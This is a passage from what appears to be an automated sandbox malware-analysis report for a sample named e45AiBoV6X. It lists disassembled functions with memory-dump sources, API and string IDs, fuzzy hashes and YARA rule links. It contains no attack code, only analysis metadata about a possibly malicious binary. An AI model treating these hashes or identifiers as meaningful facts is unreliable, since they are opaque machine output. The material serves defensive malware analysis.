                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                              • Instruction ID: 4ccb9ce30468c37a51903fa91ec71163c5e46ceb78926bf98ca762b83b7ede2f
                                                              • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                              • Instruction Fuzzy Hash: 7A113721F5C24342FB58E3259A5557A21A26F9C3B8E084334E83EC66F6FE2DE941C701
                                                              Function 00007FF6FB1FA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                              • Instruction ID: 6e4fc18ec32506725c517572023f850b7cb6299b425e65a03e800070ac70ddf2
                                                              • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                              • Instruction Fuzzy Hash: D111F720E6C20742FB68E33559551BA22925F8E378E184734D93ECA2F6FD2DB841CA42
                                                              Function 00007FF6FB1F52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                              • Instruction ID: bdfad847e93d5349798945b1985aad539a6d5d686fa60a9bfdd12c3c223e011b
                                                              • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                              • Instruction Fuzzy Hash: 5A91AD32E08A4781E721DE29E45137D3691AB49B9CF884136DAAE863F5FE3CE445C310
                                                              Function 00007FF6FB1FEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                              • Instruction ID: 16fcf6c1c2939ae8973adc2449e308ef80cfa3d205bf8e4658ba90451dbd632a
                                                              • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                              • Instruction Fuzzy Hash: 1B818B72E0E203C5FB74CF29C15027927A2AB19B4CF558035DA3AD72E9FEADE905D601
                                                              Function 00007FFDFAEE20C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989771802.00007FFDFAEE0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF44000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF93000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF1000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990150988.00007FFDFAFF5000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                              • API String ID: 4069847057-87138338
                                                              • Opcode ID: 584a3ecbb584e5f31d1f5134e6ee0f37006161d217b53c308b4eadc448ab7721
                                                              • Instruction ID: e36873e24ca769185d08284cb94f2217b2885564662714178cba051f36b9875d
                                                              • Opcode Fuzzy Hash: 584a3ecbb584e5f31d1f5134e6ee0f37006161d217b53c308b4eadc448ab7721
                                                              • Instruction Fuzzy Hash: 79713932B0854246EB68EF19A8A0AB97361BF84754F460275EE6E476DCEF3DDD058700
                                                              Function 00007FF6FB1EC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                              • Instruction ID: 7555ce8033bff93ce848f9201fb72d2c70babcad80ee5b57bb5a117864d3585a
                                                              • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                              • Instruction Fuzzy Hash: D9515F32F196438ADB14CB15E844A7D7791FB88B98F148131EA6987FE4FE79F8818700
                                                              Function 00007FF6FB1EE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                              • Instruction ID: e1f080a5e38b8d542ba4a18d8ea05712d3fa2e7b27fd4cc32a51703e8e7905ff
                                                              • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                              • Instruction Fuzzy Hash: F8616433D0878685D761DB15E4407AEB7A0FB89B98F044225EBAD87BA5DF7CE194CB00
                                                              Function 00007FF6FB1EE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                              • Instruction ID: a6c22ba9bb68c41f0de174055e8b82e1e5c9fb922441a5d797d154e7415f4d60
                                                              • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                              • Instruction Fuzzy Hash: 9E518D33E0824386EBA4CB21D04426E76A1EB5DB98F144135DA6D97FE5EFBCF8508B41
                                                              Function 00007FFDFB002833 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\async\async.c$T
                                                              • API String ID: 0-2182492907
                                                              • Opcode ID: 35f0047b15d0707436582e346161fd0798c88da3669e9136a27bd4f66ac9aa58
                                                              • Instruction ID: 1856ac2739ab7193246910b49b29995044c64ef1a73ff5b90e14431acb39d1c3
                                                              • Opcode Fuzzy Hash: 35f0047b15d0707436582e346161fd0798c88da3669e9136a27bd4f66ac9aa58
                                                              • Instruction Fuzzy Hash: 07517C31B1AA4386EB20EB11D420DB97761EF46784F444035DAAD47BEDDF3DEA09AB00
                                                              Function 00007FFDFB0C7060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: getnameinfohtons
                                                              • String ID: $..\s\crypto\bio\b_addr.c
                                                              • API String ID: 1503050688-1606403076
                                                              • Opcode ID: 3e1d6eff2a227a7976513e37b9e77a30347737a810686e613b04f7a4be4ac52b
                                                              • Instruction ID: 1f4e682c4593e5e1ee1b3ea3d3b05a79359c6f820c501d81f28f4d101a1d5791
                                                              • Opcode Fuzzy Hash: 3e1d6eff2a227a7976513e37b9e77a30347737a810686e613b04f7a4be4ac52b
                                                              • Instruction Fuzzy Hash: 3651A361B0A68386FB209F15D421AB973A0EF42784F444135EBAD47AFDEF3DE9859700
                                                              Function 00007FFDFB003841 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                              • API String ID: 0-1729655730
                                                              • Opcode ID: 01b0efafc7697a4f7d6a1a530da6b0f90e7318cc905d80235fe94a0ed0c4634c
                                                              • Instruction ID: b4ec106b901c8aa8735f00a9017c661399a6aacb2fbb230aeca15002a946444f
                                                              • Opcode Fuzzy Hash: 01b0efafc7697a4f7d6a1a530da6b0f90e7318cc905d80235fe94a0ed0c4634c
                                                              • Instruction Fuzzy Hash: BD316D72B0968382EB109B55E4619AEA360FF867D4F480035EBAC43BEEDF3DD5419B04
                                                              Function 00007FF6FB1E7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6FB1E324C,?,?,00007FF6FB1E3964), ref: 00007FF6FB1E7642
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                              • Instruction ID: a68329dc8879b11a9db30ed83c52efd69019cf10e3089e6c2c5d6ba49b7c8718
                                                              • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                              • Instruction Fuzzy Hash: 1F318221E19AC745FB21DB15E8107AE6254EB4CBE8F444231EA7D83BE9FF2CE2458700
                                                              Function 00007FFDFB001C76 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-3633731555
                                                              • Opcode ID: a869657134236d192bf55b71c30afc63e44118ee3aaabe2d3ab7b1e4e1248b07
                                                              • Instruction ID: 8f78a24dabaa1ebeadb2c51e0a47753feb60363251364ff2c8fcf2dd08dd54d7
                                                              • Opcode Fuzzy Hash: a869657134236d192bf55b71c30afc63e44118ee3aaabe2d3ab7b1e4e1248b07
                                                              • Instruction Fuzzy Hash: 0321A122B0AA8381EB10DB51E4209AAA3A0FF95794F448135EA9C47BFDEF7DD144CF00
                                                              Function 00007FF6FB1E2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
